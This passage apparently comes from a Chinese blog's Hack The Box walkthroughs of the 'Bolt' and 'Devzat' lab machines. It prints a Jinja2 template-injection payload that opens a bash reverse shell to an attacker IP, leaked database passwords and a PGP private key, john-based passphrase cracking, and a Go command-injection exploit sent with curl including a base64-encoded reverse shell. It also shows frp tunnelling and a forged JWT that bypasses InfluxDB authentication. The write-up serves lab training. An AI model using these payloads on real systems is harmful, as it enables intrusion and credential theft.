<slot wrapper '__init__' of 'object' objects>

由于使用了模板jinja2,尝试搜了下payload：

{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen("whoami").read()}}
www-data

0x03 获取权限

同样的方法发送payload:

{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.50/4444 0>&1"').read() }}

└─# nc -lvnp 4444listening on [any] 4444 ...connect to [10.10.14.50] from (UNKNOWN) [10.10.11.114] 50808bash: cannot set terminal process group (1012): Inappropriate ioctl for devicebash: no job control in this shellwww-data@bolt:~/demo$ ididuid=33(www-data) gid=33(www-data) groups=33(www-data)www-data@bolt:~/demo$ whoamiwhoamiwww-data

0x04 权限提升

www-data@bolt:~/demo$ cat /etc/passwd|grep -v nologin |grep -v falsecat /etc/passwd|grep -v nologin |grep -v falseroot:x:0:0:root:/root:/bin/bashsync:x:4:65534:sync:/bin:/bin/synceddie:x:1000:1000:Eddie Johnson,,,:/home/eddie:/bin/bashclark:x:1001:1001:Clark Griswold,,,:/home/clark:/bin/bash

www-data ->eddie

[-] /etc/init/ config file permissions:total 24drwxr-xr-x   2 root root  4096 Sep  9 10:07 .drwxr-xr-x 135 root root 12288 Sep 20 15:05 ..-rw-r--r--   1 root root  1757 Nov  6  2019 mysql.conf-rw-r--r--   1 root root   453 Dec  2  2020 whoopsie.conf

[-] Any interesting mail in /var/mail:total 24drwxrwsr-x  3 root     mail 4096 Dec 17 00:27 .drwxr-xr-x 15 root     root 4096 Aug  4 13:06 ..drwx--S---  5     5001 mail 4096 Dec 19 08:23 123-rw-------  1 eddie    mail  909 Feb 25  2021 eddie-rw-------  1 root     mail    1 Mar  3  2021 root-rw-------  1 www-data mail    1 Mar  3  2021 www-data

没找到什么可利用的点。

根据用户查文件：

www-data@bolt:/var/lib/passbolt/tmp$ find /etc -user www-data 2>/dev/nullfind /etc -user www-data 2>/dev/null/etc/passbolt/Seeds

/etc/passbolt/Seeds

在passbolt.php 中存在一个passwd: rT2;jW7<eY8!dX8}pQ8%有如下关键信息:

return [    'App' => [        // A base URL to use for absolute links.        // The url where the passbolt instance will be reachable to your end users.        // This information is need to render images in emails for example        'fullBaseUrl' => 'https://passbolt.bolt.htb',    ],
    // Database configuration.    'Datasources' => [        'default' => [            'host' => 'localhost',            'port' => '3306',            'username' => 'passbolt',            'password' => 'rT2;jW7<eY8!dX8}pQ8%',            'database' => 'passboltdb',        ],    ],

数据库连接上,没什么关键信息。

select * from users;+--------------------------------------+--------------------------------------+----------------+--------+---------+---------------------+---------------------+| id                                   | role_id                              | username       | active | deleted | created             | modified            |+--------------------------------------+--------------------------------------+----------------+--------+---------+---------------------+---------------------+| 4e184ee6-e436-47fb-91c9-dccb57f250bc | 1cfcd300-0664-407e-85e6-c11664a7d86c | eddie@bolt.htb |      1 |       0 | 2021-02-25 21:42:50 | 2021-02-25 21:55:06 || 9d8a0452-53dc-4640-b3a7-9a3d86b0ff90 | 975b9a56-b1b1-453c-9362-c238a85dad76 | clark@bolt.htb |      1 |       0 | 2021-02-25 21:40:29 | 2021-02-25 21:42:32 |

还有一个奇怪的东西

-----BEGIN PGP MESSAGE-----Version: OpenPGP.js v4.10.9Comment: https://openpgpjs.org
wcBMA/ZcqHmj13/kAQgAkS/2GvYLxglAIQpzFCydAPOj6QwdVV5BR17W5pscg/ajGlQbkE6wgmpoV7HuyABUjgrNYwZGN7ak2Pkb+/3LZgtpV/PJCAD030kYpCLSEEzPBiIGQ9VauHpATf8YZnwK1JwO/BQnpJUJV71YOon6PNV71T2zFr3HoAFbR/wPyF6Lpkwy56u3A2A6lbDb3sRl/SVIj6xtXn+fICeHjvYEm2IrE4Pxl+DjN5Nf4aqxEheWzmJwcyYqTsZLMtw+rnBlLYOaGRaa8nWmcUlMrLYD218RzyL8zZw0AEo6aOToteDPchiIMqjuExsqjG71CO1ohIIlnlK602+x7/8b7nQpedLA7wF8tR9g8Tpy+ToQOozGKBy/auqOHO66vA1EKJkYSZzMXxnp45XA38+ul0/OwtBNuNHreOIH090dHXx69IsyrYXt9dAbFhvbWr6eP/MIgh5I0RkYwGCtoPeQehKMPkCzyQl6Ren4iKS+F+L207kwqZ+jP8uEn3nauCmm64pcvy/RZJp7FUlT7Sc0hmZRIRQJ2U9vK2V63Yre0hfAj0f8F50cRR+v+BMLFNJVQ6Ck3Nov8fG5otsEteRjkc58itOGQ38EsnH3sJ3WuDw8ifeR/+K72r39WiBEiE2WHVey5nOF6WEnUOz0j0CKoFzQgri9YyK6CZ3519x3amBTgITmKPfgRsMy2OWU/7tYNdLxO3vh2Eht7tqqpzJwW0CkniTLcfrzP++0cHgAKF2tkTQtLO6QOdpzIH5aIebmi/MVUAw3a9J+qeVvjdtvb2fKCSgEYY4ny992ov5nTKSH9Hi1ny2vrBhsnO9/aqEQ+2tE60QFsa2dbAAn7QKk8VE2B05jBGSLa0H7xQxshwSQYnHaJCE6TQtOIti4o2sKEAFQnf7RDgpWeugbn/vphihSA984=P38i-----END PGP MESSAGE-----

eddie ->root

OpenPGP是一个加密工具。

比之前多了一个数据库密码。尝试连接切换用户。

其中eddie用户成功。

在邮件中发现有收到来自Clark的用户的邮件，邮件里提到密码管理系统和私钥备份。邮件如下：

eddie@bolt:/var/mail$ cat eddiecat eddieFrom clark@bolt.htb  Thu Feb 25 14:20:19 2021Return-Path: <clark@bolt.htb>X-Original-To: eddie@bolt.htbDelivered-To: eddie@bolt.htbReceived: by bolt.htb (Postfix, from userid 1001)        id DFF264CD; Thu, 25 Feb 2021 14:20:19 -0700 (MST)Subject: Important!To: <eddie@bolt.htb>X-Mailer: mail (GNU Mailutils 3.7)Message-Id: <20210225212019.DFF264CD@bolt.htb>Date: Thu, 25 Feb 2021 14:20:19 -0700 (MST)From: Clark Griswold <clark@bolt.htb>
Hey Eddie,
The password management server is up and running.  Go ahead and download the extension to your browser and get logged in.  Be sure to back up your private key because I CANNOT recover it.  Your private key is the only way to recover your account.Once you're set up you can start importing your passwords.  Please be sure to keep good security in mind - there's a few things I read about in a security whitepaper that are a little concerning...
-Clark

还发现了一个CVE-2021-22555

github搜了一个不行，回头再看。

还有一个信息。

══════════╣ Do I have PGP keys?
/usr/bin/gpg                                                                                                                                         
netpgpkeys Not Found
netpgp Not Found  

什么是PGP？？？

https://gist.github.com/jhjguxin/6037564

如果不熟悉先在本地测试。

══╣ Possible private SSH keys were found!/etc/ImageMagick-6/mime.xml/home/eddie/.config/google-chrome/Default/Extensions/didegimhafipceonhjepacocaffmoppf/3.0.5_0/index.min.js/home/eddie/.config/google-chrome/Default/Extensions/didegimhafipceonhjepacocaffmoppf/3.0.5_0/vendors/openpgp.js/home/eddie/.config/google-chrome/Default/Local Extension Settings/didegimhafipceonhjepacocaffmoppf/000003.log

在文件中找到三个公钥。。。，一个私钥，私钥如下

-----BEGIN PGP PRIVATE KEY BLOCK-----Version: OpenPGP.js v4.10.9Comment: https://openpgpjs.org
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cqxZ-----END PGP PRIVATE KEY BLOCK-----

在数据库中还有一个pgp message是需要解密的密文

众所周知，私钥一般有密码，尝试破解私钥的密码

• 使用gpg2john

└─# gpg2john pri.key > tmp                                                                                                                                                               1 ⨯File pri.key
─# cat tmp       Eddie Johnson:$gpg$*1*668*2048*2b518595f971db147efe739e2716523786988fb0ee243e5981659a314dfd0779dbba8e14e6649ba4e00cc515b9b4055a9783be133817763e161b9a8d2f2741aba80bceef6024465cba02af3bccd372297a90e078aa95579afbd60b6171cd82fd1b32a9dd016175c088e7bef9b883041eaffe933383434752686688f9d235f1d26c006a698dd6cc132d8acb94c4eceebf010845d69cd9e114873538712f2cd50c8b9ca3bcb9bbc3d83e32564f99031776ac986195e643880483ac80d3f7f1b9143563418ddea7bb71d114c4f24e41134dcdac4662e934d955aeccae92038dbed32f300ac5abed65960e26486c5da59f0d17b71ad9a8fe7a5e6bb77b8c31b68b56e7f4025f01d534be45ab36a7c0818febe23fa577ca346023feefa2bfef0899dd860e05a54d8b3e8bd430f40791a52a20067fde1861d977adf222725658a4661927d65b877cb8ac977601990cfbdb27413f5acc25ff1f691556bc8e5264cffaebbea7e7b9d73de6c719e0a7b004d331eaada86e812e3db60904eaf73a1b79c6e68e74beb6b71f6d644afbf591426418976d68c4e580cbc60b6fdd113f239ae2acd1e1dc51cb74b96b3c2f082bc0214886e1c3cebb3611311d9112d61194df22fb3ceb5783ee7d4a61b544886b389f638fc85d5139f64997014ec38ac59e65b842d92afb50184ccc3549a57dcdb3fc8720cc394912aed931007b53da1c635d302e840da2e6342803831891ab1ccc1669f3cc3240b8d31eded96696d7ad1525c4d277a4d3123abecafdbdde207714539c2e546cd45c4452051394e5d00e711fa5353f817be4fa6827aa0f1428dfb93a918e93975fb4baf3297aa3b7fec33470cf2741237a629b869a762684602057f3e3e6df9c97631caa7589dc4b26653162dfb2f2cf508cbe375496ba735830c2c00f151cdd50c522afe33dbe4265d2*3*254*8*9*16*b81f0847e01fb836c8cc7c8a2af31f19*16777216*34af9ef3956d5ad8:::Eddie Johnson <eddie@bolt.htb>::pri.key

• 进行破解

┌──(root💀kali)-[~/tmp]└─# john --wordlist=/usr/share/wordlists/rockyou.txt tmpUsing default input encoding: UTF-8Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])Cost 1 (s2k-count) is 16777216 for all loaded hashesCost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 8 for all loaded hashesCost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashesWill run 4 OpenMP threadsPress 'q' or Ctrl-C to abort, almost any other key for statusmerrychristmas   (Eddie Johnson)1g 0:00:13:03 DONE (2021-12-20 11:05) 0.001277g/s 54.71p/s 54.71c/s 54.71C/s mhines..menudoUse the "--show" option to display all of the cracked passwords reliablySession completed

解密:

gpg --batch --import /tmp/pri.keygpg --pinentry-mode loopback --passphrase merrychristmas -d /tmp/pub.key
{"password":"Z(2rmxsNW(Z?3=p/9s","description":""}

切换用户到root,成功获取权限。

喜欢就请关注我们吧！

【HTB系列】Devazt

信息收集

└─# nmap 10.10.11.118 -p 22,80,8000 -sC -sV   --min-rate=200 Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-21 01:26 ESTNmap scan report for 10.10.11.118Host is up (0.38s latency).
PORT     STATE SERVICE VERSION22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: |   3072 c2:5f:fb:de:32:ff:44:bf:08:f5:ca:49:d4:42:1a:06 (RSA)|   256 bc:cd:e8:ee:0a:a9:15:76:52:bc:19:a4:a3:b2:ba:ff (ECDSA)|_  256 62:ef:72:52:4f:19:53:8b:f2:9b:be:46:88:4b:c3:d0 (ED25519)80/tcp   open  http    Apache httpd 2.4.41|_http-server-header: Apache/2.4.41 (Ubuntu)|_http-title: Did not follow redirect to http://devzat.htb/8000/tcp open  ssh     (protocol 2.0)| fingerprint-strings: |   NULL: |_    SSH-2.0-Go| ssh-hostkey: |_  3072 6a:ee:db:90:a6:10:30:9f:94:ff:bf:61:95:2a:20:63 (RSA)1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :SF-Port8000-TCP:V=7.92%I=7%D=12/21%Time=61C173B9%P=x86_64-pc-linux-gnu%r(NSF:ULL,C,"SSH-2\.0-Go\r\n");Service Info: Host: devzat.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 55.89 seconds

写入hosts

[04:17:55] 200 -   17KB - /LICENSE.txt                                      [04:17:56] 200 -  877B  - /README.txt                                       [04:18:40] 301 -  309B  - /assets  ->  http://devzat.htb/assets/            [04:18:40] 200 -    1KB - /assets/[04:19:18] 301 -  309B  - /images  ->  http://devzat.htb/images/            [04:19:18] 200 -    2KB - /images/[04:19:20] 200 -    6KB - /index.html                                       [04:19:23] 301 -  313B  - /javascript  ->  http://devzat.htb/javascript/

找一下子域，扫描下vhost。扫到了一个pets

用户名

CookieMiaChuckBaluGeorgGustavRudiBruno

漏洞挖掘

尝试添加一下宠物没什么反应。

扫下目录发现 .git 还有目录下的一个目录 build 信息泄露

成功导出的目录如下：

┌──(root💀kali)-[/tmp/dump]└─# tree.├── 0-464614f32483e1fde60ee53f5d3b4d468d80ff62│   ├── characteristics│   ├── commit-meta.txt│   ├── go.mod│   └── go.sum├── 1-8274d7a547c0c3854c074579dfc359664082a8f6│   ├── characteristics│   ├── commit-meta.txt│   ├── go.mod│   └── go.sum└── 2-ef07a04ebb2fc92cf74a39e0e4b843630666a705    ├── characteristics    ├── commit-meta.txt    ├── go.mod    ├── go.sum    ├── main.go    └── petshop
6 directories, 11 files

查看代码发现main.go就是pets.devzat.htb的源代码

package main
import (        "embed"        "encoding/json"        "fmt"        "io/fs"        "io/ioutil"        "log"        "net/http"        "os/exec"        "time")
//go:embed static/publicvar web embed.FS
//go:embed static/public/index.htmlvar index []byte
type Pet struct {        Name            string `json:"name"`        Species         string `json:"species"`        Characteristics string `json:"characteristics"`}
var (        Pets []Pet = []Pet{                {Name: "Cookie", Species: "cat", Characteristics: loadCharacter("cat")},                {Name: "Mia", Species: "cat", Characteristics: loadCharacter("cat")},                {Name: "Chuck", Species: "dog", Characteristics: loadCharacter("dog")},                {Name: "Balu", Species: "dog", Characteristics: loadCharacter("dog")},                {Name: "Georg", Species: "gopher", Characteristics: loadCharacter("gopher")},                {Name: "Gustav", Species: "giraffe", Characteristics: loadCharacter("giraffe")},                {Name: "Rudi", Species: "redkite", Characteristics: loadCharacter("redkite")},                {Name: "Bruno", Species: "bluewhale", Characteristics: loadCharacter("bluewhale")},        })
func loadCharacter(species string) string {        cmd := exec.Command("sh", "-c", "cat characteristics/"+species)        stdoutStderr, err := cmd.CombinedOutput()        if err != nil {                return err.Error()        }        return string(stdoutStderr)}
func getPets(w http.ResponseWriter, r *http.Request) {        json.NewEncoder(w).Encode(Pets)}
func addPet(w http.ResponseWriter, r *http.Request) {        reqBody, _ := ioutil.ReadAll(r.Body)        var addPet Pet        err := json.Unmarshal(reqBody, &addPet)        if err != nil {                e := fmt.Sprintf("There has been an error: %+v", err)                http.Error(w, e, http.StatusBadRequest)                return        }
        addPet.Characteristics = loadCharacter(addPet.Species)        Pets = append(Pets, addPet)
        w.WriteHeader(http.StatusOK)        fmt.Fprint(w, "Pet was added successfully")}
func handleRequest() {        build, err := fs.Sub(web, "static/public/build")        if err != nil {                panic(err)        }
        css, err := fs.Sub(web, "static/public/css")        if err != nil {                panic(err)        }
        webfonts, err := fs.Sub(web, "static/public/webfonts")        if err != nil {                panic(err)        }
        spaHandler := http.HandlerFunc(spaHandlerFunc)        // Single page application handler        http.Handle("/", headerMiddleware(spaHandler))
        // All static folder handler        http.Handle("/build/", headerMiddleware(http.StripPrefix("/build", http.FileServer(http.FS(build)))))        http.Handle("/css/", headerMiddleware(http.StripPrefix("/css", http.FileServer(http.FS(css)))))        http.Handle("/webfonts/", headerMiddleware(http.StripPrefix("/webfonts", http.FileServer(http.FS(webfonts)))))        http.Handle("/.git/", headerMiddleware(http.StripPrefix("/.git", http.FileServer(http.Dir(".git")))))
        // API routes        apiHandler := http.HandlerFunc(petHandler)        http.Handle("/api/pet", headerMiddleware(apiHandler))        log.Fatal(http.ListenAndServe("127.0.0.1:5000", nil))}
func spaHandlerFunc(w http.ResponseWriter, r *http.Request) {        w.WriteHeader(http.StatusOK)        w.Write(index)}
func petHandler(w http.ResponseWriter, r *http.Request) {        // Dispatch by method        if r.Method == http.MethodPost {                addPet(w, r)        } else if r.Method == http.MethodGet {                getPets(w, r)
        } else {                http.Error(w, "Method not allowed", http.StatusMethodNotAllowed)        }        // TODO: Add Update and Delete}
func headerMiddleware(next http.Handler) http.Handler {        return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {                w.Header().Add("Server", "My genious go pet server")                next.ServeHTTP(w, r)        })}
func main() {        resetTicker := time.NewTicker(5 * time.Second)        done := make(chan bool)
        go func() {                for {                        select {                        case <-done:                                return                        case <-resetTicker.C:                                // Reset Pets to prestaged ones                                Pets = []Pet{                                        {Name: "Cookie", Species: "cat", Characteristics: loadCharacter("cat")},                                        {Name: "Mia", Species: "cat", Characteristics: loadCharacter("cat")},                                        {Name: "Chuck", Species: "dog", Characteristics: loadCharacter("dog")},                                        {Name: "Balu", Species: "dog", Characteristics: loadCharacter("dog")},                                        {Name: "Georg", Species: "gopher", Characteristics: loadCharacter("gopher")},                                        {Name: "Gustav", Species: "giraffe", Characteristics: loadCharacter("giraffe")},                                        {Name: "Rudi", Species: "redkite", Characteristics: loadCharacter("redkite")},                                        {Name: "Bruno", Species: "bluewhale", Characteristics: loadCharacter("bluewhale")},                                }
                        }                }        }()
        handleRequest()
        time.Sleep(500 * time.Millisecond)        resetTicker.Stop()        done <- true}

源码比较简单，主要逻辑如下：

• loadCharacter直接调用了exec.Command(),虽然我不知道这个函数的意思，但是参数是一个命令执行cat。

• 在addPet()函数中调用loadCharacter()且参数可控。

• 在petHandler中当发送请求为POST时，将会执行addPet()

• 在handleRequest()方法中最后将petHandler实例化，设置接口/api/pet。

• 在main()函数中调用了handleRequest()

调用栈如下：

main():  handleRequest()    petHandler()      POST -> addHanler()        loadCharacter()           exec.Command()

尝试构造payload:

sh -c  cat characteristics/ +`curl 10.10.14.50/123`

漏洞利用

curl http://pets.devzat.htb/api/pet -X POST --data '{"name":"123","species":"`curl 10.10.14.50/123`"}'

curl http://pets.devzat.htb/api/pet -X POST --data  '{"name":"123","species":"`echo c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNTAvNDQ0NCAwPiYxCg== |base64 -d |bash`"}'

发现私钥,尝试连接22端口，失败了？之前的web页面上有说连8000端口 ,而且8000端口开着，作者在这里来了个surprise!!!

权限提升

patrick -> catherine

先不看这个信息收集一下

root:x:0:0:root:/root:/bin/bashsync:x:4:65534:sync:/bin:/bin/syncpatrick:x:1000:1000:patrick:/home/patrick:/bin/bashcatherine:x:1001:1001:catherine,,,:/home/catherine:/bin/bash

[+] Looks like we're hosting Docker:Docker version 20.10.7, build f0df350

$ netstat -antActive Internet connections (servers and established)Proto Recv-Q Send-Q Local Address           Foreign Address         State      tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN     tcp        0      0 127.0.0.1:8086          0.0.0.0:*               LISTEN     tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN     tcp        0      0 127.0.0.1:8443          0.0.0.0:*               LISTEN     tcp        0      0 127.0.0.1:5000          0.0.0.0:*               LISTEN     tcp        0      0 127.0.0.1:49532         127.0.0.1:5000          FIN_WAIT2  tcp        0      0 127.0.0.1:5000          127.0.0.1:49532         CLOSE_WAIT tcp        0      1 10.10.11.118:52254      1.1.1.1:53              SYN_SENT   tcp        0      0 10.10.11.118:47040      10.10.14.50:4444        CLOSE_WAIT tcp        0      0 10.10.11.118:47472      10.10.14.50:4444        ESTABLISHEDtcp6       0      0 :::80                   :::*                    LISTEN     tcp6       0      0 :::22                   :::*                    LISTEN     tcp6       0      0 :::8000                 :::*                    LISTEN

本地开有两个端口 8443 8086在服务器是看不出来是什么服务。

有一个ssh连接，走一个ssh隧道

ssh -L  8086:127.0.0.1:8086 patrick@devzat.htb -p 8000

不行，换frp

cat << EOF >3.txt[common]server_addr = 10.10.14.50server_port = 7000
[ssh]type = tcplocal_ip = 127.0.0.1local_port = 8086remote_port = 6000

nmap 172.16.0.4 -sV -p 6000Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-22 23:49 ?D1ú±ê×?ê±??Nmap scan report for 172.16.0.4Host is up (0.00s latency).
PORT     STATE SERVICE VERSION6000/tcp open  http    InfluxDB http admin 1.7.5MAC Address: 00:0C:29:E9:FA:DE (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 8.17 seconds

还是无法访问web界面，但是成功扫描到一些目录

[23:55:47] 200 -    2KB - /debug/pprof
[23:55:47] 200 -    9KB - /debug/pprof/goroutine?debug=1
[23:55:47] 200 -   19KB - /debug/pprof/heap
[23:56:09] 200 -    5KB - /metrics
[23:56:21] 204 -    0B  - /ping
[23:56:34] 204 -    0B  - /status
[23:56:34] 204 -    0B  - /status?full=true

curl -G http://127.0.0.1:6000/
{"error":"unable to parse authentication credentials"}

通过网络可以得到InfluxDB http admin 1.7.5存在一个认证绕过的漏洞，认证方法是Jwt,使用python -c "import time;print(time.time())"可以直接获取时间戳，然后创建一个jwt token:

{"alg": "HS256"}
{"username":"admin","exp":1640199606}

eyJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjQwMTk5NjA2fQ.P4YLD0EJs799vYeILkqwvMhvi3BsP20KwkseNQeGeYQ

C:\>curl -G http://172.16.0.4:6000/query  -H "Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjQwMTk5NjA2fQ.P4YLD0EJs799vYeILkqwvMhvi3BsP20KwkseNQeGeYQ" -i --data-urlencode "q=show databases"


{"results":[{"statement_id":0,"series":[{"name":"databases","columns":["name"],"values":[["devzat"],["_internal"]]}]}]}

C:\>curl -G http://172.16.0.4:6000/query?db=devzat  -H "Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjQwMTk5NjA2fQ.P4YLD0EJs799vYeILkqwvMhvi3BsP20KwkseNQeGeYQ" --data-urlencode "q=show measurements"

{"results":[{"statement_id":0,"series":[{"name":"measurements","columns":["name"],"values":[["user"]]}]}]}

C:\Users\Administrator>curl -G "http://172.16.0.4:6000/query?q=show+field+keys&db=devzat"  -H "Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjQwMTk5NjA2fQ.P4YLD0EJs799vYeILkqwvMhvi3BsP20KwkseNQeGeYQ" -i

{"results":[{"statement_id":0,"series":[{"name":"user","columns":["fieldKey","fieldType"],"values":[["enabled","boolean"],["password","string"],["username","string"]]}]}]}

C:\>curl -G http://172.16.0.4:6000/query?db=devzat  -H "Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjQwMTk5NjA2fQ.P4YLD0EJs799vYeILkqwvMhvi3BsP20KwkseNQeGeYQ" --data-urlencode "q=select * from \"user\""

